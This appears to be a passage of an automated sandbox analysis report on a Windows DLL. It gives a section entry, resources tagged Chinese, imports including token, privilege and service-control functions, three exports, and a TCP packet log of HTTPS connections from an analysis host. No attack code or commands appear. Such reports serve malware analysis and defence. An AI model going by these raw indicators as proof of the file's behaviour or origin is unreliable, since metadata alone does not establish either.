wsgi2 | 0x175000 | 0xf000 | 0xf000 | b7c58b113f4188c6a8fd746cea1c7c0d | False | 0.67568359375 | data | 7.435435645637308 | IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_RCDATA | 0x1730a0 | 0x80 | ASCII text, with no line terminators | Chinese | China | 0.09375
RT_MANIFEST | 0x173120 | 0x17d | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5931758530183727
DLL | Import
KERNEL32.dll | GlobalLock, GlobalSize, GlobalUnlock, GetFileAttributesExW, GetTickCount, DeviceIoControl, GetCurrentProcessId, GetLongPathNameW, GetWindowsDirectoryW, GetCurrentDirectoryW, MoveFileExW, SearchPathW, CreateThread, WaitForSingleObject, GetCurrentThreadId, GetVersion, GetSystemDefaultUILanguage, GetFileSize, GetLocalTime, VirtualProtect, GetModuleHandleExW, IsBadStringPtrW, ProcessIdToSessionId, OpenProcess, CreateProcessW, WTSGetActiveConsoleSessionId, MapViewOfFile, UnmapViewOfFile, GetProcessId, LocalAlloc, LocalFree, CreateFileMappingW, GetFileSizeEx, GlobalFree, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, ResumeThread, GetSystemTimeAsFileTime, ReleaseMutex, GetSystemTime, SystemTimeToFileTime, SetFileAttributesW, DeleteFileW, OpenFileMappingW, OpenThread, GetCommandLineW, OutputDebugStringW, RtlPcToFileHeader, FormatMessageW, CreateFileA, LocalFileTimeToFileTime, SetFilePointerEx, HeapLock, HeapUnlock, HeapWalk, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, GetFileTime, GlobalAlloc, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, InitializeSListHead, InterlockedFlushSList, ExitProcess, OpenMutexW, CreateMutexW, WideCharToMultiByte, FindResourceExW, InitializeCriticalSectionAndSpinCount, GetModuleFileNameW, RaiseException, InitializeCriticalSection, lstrcmpiW, DeleteCriticalSection, SetLastError, CloseHandle, GetLastError, LoadLibraryW, GetSystemDirectoryW, SetFilePointer, GetVersionExW, GetSystemWindowsDirectoryW, FindResourceW, SizeofResource, LoadResource, LockResource, FreeResource, GetFileInformationByHandle, CreateFileW, Sleep, ReadFile, LeaveCriticalSection, EnterCriticalSection, MultiByteToWideChar, LoadLibraryExW, ExpandEnvironmentStringsW, FreeLibrary, GetCurrentProcess, GetProcAddress, GetModuleHandleW, GetFileAttributesW, GetProcessHeap, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, HeapDestroy, WriteFile, GetExitCodeProcess, IsDebuggerPresent
USER32.dll | IsZoomed, GetWindowTextW, SendMessageTimeoutW, SystemParametersInfoW, EnumDisplayDevicesW, GetLastInputInfo, GetClassNameW, GetShellWindow, GetWindowInfo, EnumWindows, WindowFromPoint, GetWindowRect, GetDesktopWindow, GetSystemMetrics, GetWindow, IsWindowVisible, CharNextW, FindWindowW, IsWindow, GetForegroundWindow, MonitorFromWindow, wsprintfW, GetWindowThreadProcessId, SetForegroundWindow, LoadStringW, GetAncestor
ADVAPI32.dll | RegDeleteKeyW, ConvertStringSecurityDescriptorToSecurityDescriptorW, LookupAccountSidW, SetSecurityDescriptorDacl, InitializeSecurityDescriptor, CreateProcessAsUserW, CloseServiceHandle, QueryServiceStatus, StartServiceW, ChangeServiceConfigW, OpenServiceW, OpenSCManagerW, GetSidSubAuthority, GetSidSubAuthorityCount, GetTokenInformation, FreeSid, GetLengthSid, SetTokenInformation, AllocateAndInitializeSid, CreateRestrictedToken, DuplicateTokenEx, OpenProcessToken, AdjustTokenPrivileges, LookupPrivilegeValueW, CryptReleaseContext, CryptGenRandom, CryptAcquireContextW, RegEnumValueW, RegCreateKeyW, RegQueryInfoKeyW, RegSetValueExW, RegDeleteValueW, RegEnumKeyExW, RegCreateKeyExW, RegCloseKey, RegQueryValueExW, RegEnumKeyW, RegOpenKeyExW, RegQueryValueExA
SHELL32.dll | SHGetPathFromIDListW, SHGetSpecialFolderLocation, ShellExecuteExW, ShellExecuteW, SHGetSpecialFolderPathW, SHGetFileInfoW, SHGetDesktopFolder, SHGetMalloc
ole32.dll | GetHGlobalFromStream, IIDFromString, StringFromGUID2, CoInitialize, CreateStreamOnHGlobal, CoCreateInstance, CoTaskMemRealloc, CoTaskMemAlloc, CoTaskMemFree, CoUninitialize
OLEAUT32.dll | SysAllocStringByteLen, SafeArrayPutElement, VariantChangeType, VariantInit, SafeArrayCreate, SafeArrayGetElement, VariantClear, SysStringByteLen, SysFreeString, SysAllocString, VarUI4FromStr
SHLWAPI.dll | PathRemoveFileSpecW, PathAppendW, SHSetValueW, SHGetValueW, PathAddBackslashW, PathFileExistsW, StrCmpNIW, PathFindFileNameW, PathIsRelativeW, StrCpyNW, PathIsDirectoryW, StrPBrkA, StrPBrkW, StrStrIA, StrStrIW, PathFindExtensionW, SHEnumValueW, StrCmpIW, PathCombineW, StrRetToBufW
WS2_32.dll | WSACleanup, WSCDeinstallProvider, WSCDeinstallProvider32, WSCUnInstallNameSpace, WSAGetLastError, WSAStartup, ntohl, htons, htonl, ntohs
VERSION.dll | VerQueryValueW
IPHLPAPI.DLL | GetIpAddrTable
WTSAPI32.dll | WTSFreeMemory, WTSQueryUserToken, WTSQuerySessionInformationW
USERENV.dll | CreateEnvironmentBlock, DestroyEnvironmentBlock
PSAPI.DLL | GetModuleFileNameExW
msvcrt.dll | wcstol, realloc, wcsspn, wcscspn, _mbsstr, _mbsrchr, _mktime64, towupper, memmove, memset, _CxxThrowException, ??0exception@@QEAA@AEBQEBD@Z, ??0exception@@QEAA@AEBV0@@Z, ??1exception@@UEAA@XZ, ?what@exception@@UEBAPEBDXZ, memcpy, memcmp, wcscmp, _amsg_exit, __getmainargs, _initterm, __CxxFrameHandler, __DestructExceptionObject, _localtime64, ___lc_codepage_func, rand, atoi, wcspbrk, __pctype_func, tolower, ___mb_cur_max_func, strtol, localeconv, ___lc_handle_func, abort, memchr, _wcstoui64, _msize, _XcptFilter, mbtowc, strrchr, iswctype, srand, ceil, log10, _clearfp, ?terminate@@YAXXZ, _wtoi, malloc, free, wcsstr, wcschr, wcsncmp, __C_specific_handler, ??_V@YAXPEAX@Z, ??3@YAXPEAX@Z, _wtoi64, _wcsupr, _wcslwr, _strlwr, strchr, _time64, _wcsnicmp, ??2@YAPEAX_K@Z, _wcsicmp, wcsrchr, calloc, iswspace, _errno, ??_U@YAPEAX_K@Z, sqrt
Name | Ordinal | Address
CreateObject | 2 | 0x180004844
homq | 1 | 0x18001b208
RegisterInstallTime | 3 | 0x18005b578
Language of compilation system | Country where language is spoken | Map
Chinese | China |
English | United States |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                Apr 26, 2024 23:15:11.989206076 CEST49704443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:11.989212990 CEST4434970440.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:12.105036974 CEST49707443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:12.105082989 CEST4434970740.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:12.105336905 CEST49707443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:12.105782032 CEST49707443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:12.105796099 CEST4434970740.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:12.204886913 CEST49708443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:12.204998016 CEST4434970840.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:12.205251932 CEST49708443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:12.225720882 CEST49708443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:12.225761890 CEST4434970840.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:12.589365005 CEST4434970740.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:12.589457989 CEST49707443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:12.699625969 CEST4434970840.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:12.802778959 CEST49708443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:12.802838087 CEST4434970840.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:12.803749084 CEST49708443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:12.803762913 CEST4434970840.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:12.803808928 CEST49708443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:12.803828955 CEST4434970840.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:12.838834047 CEST49707443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:12.838855982 CEST4434970740.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:12.839143991 CEST4434970740.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:12.840454102 CEST49707443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:12.840512037 CEST49707443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:12.840537071 CEST4434970740.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:13.202334881 CEST4434970740.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:13.202428102 CEST4434970740.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:13.202471018 CEST49707443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:13.253410101 CEST49707443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:13.253410101 CEST49707443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:13.253452063 CEST4434970740.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:13.253465891 CEST4434970740.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:13.317842007 CEST49712443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:13.317924976 CEST44349712142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:13.318031073 CEST49712443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:13.318053007 CEST49713443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:13.318099022 CEST44349713142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:13.318149090 CEST49713443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:13.318403006 CEST49713443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:13.318412066 CEST44349713142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:13.318665981 CEST49712443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:13.318696976 CEST44349712142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:13.339365959 CEST49714443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:13.339394093 CEST44349714142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:13.339457035 CEST49714443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:13.340272903 CEST49714443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:13.340287924 CEST44349714142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:13.340735912 CEST49715443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:13.340817928 CEST44349715142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:13.340884924 CEST49715443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:13.341063023 CEST49715443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:13.341093063 CEST44349715142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:13.673366070 CEST44349715142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:13.673778057 CEST49715443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:13.673816919 CEST44349715142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:13.674825907 CEST44349715142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:13.674895048 CEST49715443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:13.676184893 CEST49715443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:13.676254034 CEST44349715142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:13.676374912 CEST49715443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:13.676403999 CEST44349715142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:13.706959963 CEST44349712142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:13.708297014 CEST49712443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:13.708338022 CEST44349712142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:13.709819078 CEST44349712142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:13.709891081 CEST49712443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:13.710115910 CEST44349713142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:13.710571051 CEST49712443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:13.710671902 CEST44349712142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:13.710767031 CEST49713443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:13.710784912 CEST44349713142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:13.710947037 CEST49712443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:13.710964918 CEST44349712142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:13.712269068 CEST44349713142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:13.712483883 CEST49713443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:13.712810993 CEST49713443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:13.712898970 CEST44349713142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:13.712928057 CEST49713443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:13.756117105 CEST44349713142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:13.769542933 CEST44349714142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:13.771267891 CEST49714443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:13.771281958 CEST44349714142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:13.772845984 CEST44349714142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:13.772906065 CEST49714443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:13.774183989 CEST49714443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:13.774261951 CEST44349714142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:13.774349928 CEST49714443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:13.780086040 CEST49712443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:13.793756962 CEST49715443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:13.793817997 CEST49713443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:13.793836117 CEST44349713142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:13.820122004 CEST44349714142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:13.886265993 CEST49712443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:13.886396885 CEST44349712142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:13.886456013 CEST49712443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:13.889004946 CEST49714443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:13.889018059 CEST44349714142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:13.984582901 CEST49713443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:14.021025896 CEST44349715142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:14.021279097 CEST44349715142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:14.021362066 CEST49715443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:14.021378040 CEST44349715142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:14.021450043 CEST44349715142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:14.021502018 CEST49715443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:14.021508932 CEST44349715142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:14.031141996 CEST44349715142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:14.034183025 CEST44349715142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:14.034260988 CEST49715443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:14.094002008 CEST49714443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:14.390825033 CEST49675443192.168.2.523.1.237.91
                                                                                                Apr 26, 2024 23:15:14.390830040 CEST49674443192.168.2.523.1.237.91
                                                                                                Apr 26, 2024 23:15:14.452274084 CEST44349714142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:14.452366114 CEST49714443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:14.452444077 CEST44349714142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:14.452619076 CEST44349714142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:14.452686071 CEST49714443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:14.459628105 CEST4434970840.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:14.459660053 CEST4434970840.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:14.459673882 CEST4434970840.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:14.459696054 CEST4434970840.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:14.459705114 CEST4434970840.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:14.459707975 CEST49708443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:14.459712982 CEST4434970840.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:14.459724903 CEST4434970840.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:14.459726095 CEST49708443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:14.459748983 CEST49708443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:14.459772110 CEST49708443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:14.459790945 CEST4434970840.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:14.459871054 CEST4434970840.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:14.459909916 CEST49708443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:14.578308105 CEST49673443192.168.2.523.1.237.91
                                                                                                Apr 26, 2024 23:15:15.001202106 CEST44349713142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:15.001282930 CEST49713443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:15.001317024 CEST44349713142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:15.001384974 CEST44349713142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:15.001430035 CEST49713443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:15.266671896 CEST49708443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:15.266717911 CEST4434970840.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:15.266748905 CEST49708443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:15.266767025 CEST4434970840.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:15.352736950 CEST49714443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:15.352768898 CEST44349714142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:15.354243994 CEST49713443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:15.354288101 CEST44349713142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:15.661475897 CEST49715443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:15.661516905 CEST44349715142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:15.680234909 CEST49719443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:15.680269003 CEST44349719142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:15.680334091 CEST49719443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:15.718099117 CEST49719443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:15.718121052 CEST44349719142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:15.926053047 CEST4434970323.1.237.91192.168.2.5
                                                                                                Apr 26, 2024 23:15:15.926163912 CEST49703443192.168.2.523.1.237.91
                                                                                                Apr 26, 2024 23:15:15.985249043 CEST49721443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:15.985304117 CEST44349721142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:15.985367060 CEST49721443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:15.985583067 CEST49721443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:15.985610962 CEST44349721142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:15.986447096 CEST49722443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:15.986531019 CEST4434972240.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:15.986629963 CEST49722443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:15.986797094 CEST49722443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:15.986830950 CEST4434972240.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:16.044291019 CEST44349719142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:16.044591904 CEST49719443192.168.2.5142.250.217.228
                                                                                                Apr 26, 2024 23:15:16.044619083 CEST44349719142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:26.602075100 CEST4434970323.1.237.91192.168.2.5
                                                                                                Apr 26, 2024 23:15:26.627095938 CEST4434973140.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:26.627242088 CEST4434973140.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:26.627279043 CEST4434973140.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:26.627338886 CEST4434973140.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:26.627357006 CEST49731443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:26.627357006 CEST49731443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:26.627433062 CEST49731443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:26.627679110 CEST49731443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:26.627679110 CEST49731443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:26.627691984 CEST4434973140.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:26.627698898 CEST4434973140.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:26.668515921 CEST4434973452.165.165.26192.168.2.5
                                                                                                Apr 26, 2024 23:15:26.668628931 CEST49734443192.168.2.552.165.165.26
                                                                                                Apr 26, 2024 23:15:26.670651913 CEST49734443192.168.2.552.165.165.26
                                                                                                Apr 26, 2024 23:15:26.670661926 CEST4434973452.165.165.26192.168.2.5
                                                                                                Apr 26, 2024 23:15:26.670896053 CEST4434973452.165.165.26192.168.2.5
                                                                                                Apr 26, 2024 23:15:26.708188057 CEST49736443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:26.708237886 CEST4434973640.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:26.708329916 CEST49736443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:26.710809946 CEST49736443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:26.710828066 CEST4434973640.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:26.742156982 CEST49734443192.168.2.552.165.165.26
                                                                                                Apr 26, 2024 23:15:26.788119078 CEST4434973452.165.165.26192.168.2.5
                                                                                                Apr 26, 2024 23:15:26.845863104 CEST4434973523.1.237.91192.168.2.5
                                                                                                Apr 26, 2024 23:15:26.845988035 CEST49735443192.168.2.523.1.237.91
                                                                                                Apr 26, 2024 23:15:26.937208891 CEST49735443192.168.2.523.1.237.91
                                                                                                Apr 26, 2024 23:15:26.937263012 CEST4434973523.1.237.91192.168.2.5
                                                                                                Apr 26, 2024 23:15:26.938467979 CEST4434973523.1.237.91192.168.2.5
                                                                                                Apr 26, 2024 23:15:26.938579082 CEST49735443192.168.2.523.1.237.91
                                                                                                Apr 26, 2024 23:15:26.940536976 CEST49735443192.168.2.523.1.237.91
                                                                                                Apr 26, 2024 23:15:26.940536976 CEST49735443192.168.2.523.1.237.91
                                                                                                Apr 26, 2024 23:15:26.940607071 CEST4434973523.1.237.91192.168.2.5
                                                                                                Apr 26, 2024 23:15:27.177794933 CEST4434973452.165.165.26192.168.2.5
                                                                                                Apr 26, 2024 23:15:27.177846909 CEST4434973452.165.165.26192.168.2.5
                                                                                                Apr 26, 2024 23:15:27.177854061 CEST4434973452.165.165.26192.168.2.5
                                                                                                Apr 26, 2024 23:15:27.177871943 CEST4434973452.165.165.26192.168.2.5
                                                                                                Apr 26, 2024 23:15:27.177886009 CEST4434973452.165.165.26192.168.2.5
                                                                                                Apr 26, 2024 23:15:27.177895069 CEST4434973452.165.165.26192.168.2.5
                                                                                                Apr 26, 2024 23:15:27.177911043 CEST49734443192.168.2.552.165.165.26
                                                                                                Apr 26, 2024 23:15:27.177944899 CEST4434973452.165.165.26192.168.2.5
                                                                                                Apr 26, 2024 23:15:27.177964926 CEST49734443192.168.2.552.165.165.26
                                                                                                Apr 26, 2024 23:15:27.177975893 CEST49734443192.168.2.552.165.165.26
                                                                                                Apr 26, 2024 23:15:27.178044081 CEST49734443192.168.2.552.165.165.26
                                                                                                Apr 26, 2024 23:15:27.178157091 CEST4434973452.165.165.26192.168.2.5
                                                                                                Apr 26, 2024 23:15:27.178239107 CEST4434973452.165.165.26192.168.2.5
                                                                                                Apr 26, 2024 23:15:27.178247929 CEST49734443192.168.2.552.165.165.26
                                                                                                Apr 26, 2024 23:15:27.178286076 CEST49734443192.168.2.552.165.165.26
                                                                                                Apr 26, 2024 23:15:27.193022013 CEST49734443192.168.2.552.165.165.26
                                                                                                Apr 26, 2024 23:15:27.193022013 CEST49734443192.168.2.552.165.165.26
                                                                                                Apr 26, 2024 23:15:27.193046093 CEST4434973452.165.165.26192.168.2.5
                                                                                                Apr 26, 2024 23:15:27.193058968 CEST4434973452.165.165.26192.168.2.5
                                                                                                Apr 26, 2024 23:15:27.204237938 CEST4434973640.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:27.204895020 CEST49736443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:27.204935074 CEST4434973640.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:27.205610991 CEST49736443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:27.205610991 CEST49736443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:27.205625057 CEST4434973640.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:27.205646992 CEST4434973640.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:27.292279005 CEST4434973523.1.237.91192.168.2.5
                                                                                                Apr 26, 2024 23:15:27.292469978 CEST49735443192.168.2.523.1.237.91
                                                                                                Apr 26, 2024 23:15:27.292823076 CEST4434973523.1.237.91192.168.2.5
                                                                                                Apr 26, 2024 23:15:27.292956114 CEST4434973523.1.237.91192.168.2.5
                                                                                                Apr 26, 2024 23:15:27.293023109 CEST49735443192.168.2.523.1.237.91
                                                                                                Apr 26, 2024 23:15:27.293023109 CEST49735443192.168.2.523.1.237.91
                                                                                                Apr 26, 2024 23:15:27.569087029 CEST4434973640.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:27.569120884 CEST4434973640.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:27.569168091 CEST4434973640.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:27.569192886 CEST49736443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:27.569214106 CEST4434973640.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:27.569226980 CEST49736443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:27.569272041 CEST4434973640.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:27.569350004 CEST49736443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:27.574217081 CEST49736443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:27.574237108 CEST4434973640.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:27.574250937 CEST49736443192.168.2.540.126.28.23
                                                                                                Apr 26, 2024 23:15:27.574260950 CEST4434973640.126.28.23192.168.2.5
                                                                                                Apr 26, 2024 23:15:27.653513908 CEST44349724142.250.217.228192.168.2.5
                                                                                                Apr 26, 2024 23:15:27.653614044 CEST44349724142.250.217.228192.168.2.5
